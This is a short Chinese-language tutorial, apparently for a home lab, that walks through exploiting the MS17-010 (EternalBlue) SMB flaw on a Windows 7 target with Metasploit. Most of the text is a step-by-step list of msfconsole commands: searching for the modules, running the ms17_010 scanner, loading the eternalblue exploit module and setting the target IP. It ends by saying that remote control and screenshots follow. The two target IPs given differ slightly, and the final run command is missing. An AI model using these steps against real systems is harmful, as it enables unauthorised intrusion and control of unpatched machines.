PS:一定要先检测一下Win7的防火墙有没有关闭不然不会存在漏洞
- 先去在msf中找一下msf的脚本
search ms17-010 #搜索msf中和ms17-010漏洞有关的脚本。出现以下图形就可以了,每次图形都不一样哦 -
使用ms17-010的辅助性脚本
use auxiliary/scanner/smb/smb_ms17_010 #使用ms17-010的辅助模块 -
配置ms17-010的辅助性脚本
show options #查看有哪些项需要进行配置
set rhosts 192.168.233.139 #配置要攻击的靶机的ip地址 -
配置完成后,执行ms17-010的辅助性脚本
run #运行模块 -
使用ms17-010攻击性模块
use exploit/windows/smb/ms17_010_eternalblue #使用ms17-010的攻击模块 -
查看配置项
show options #查看配置项 -
设置被攻击机器ip
set rhosts 192.168.223.139 #设置被攻击机器ip -
运行ms17-010攻击模块
-
然后就可以进行截图,远程等等的操作啦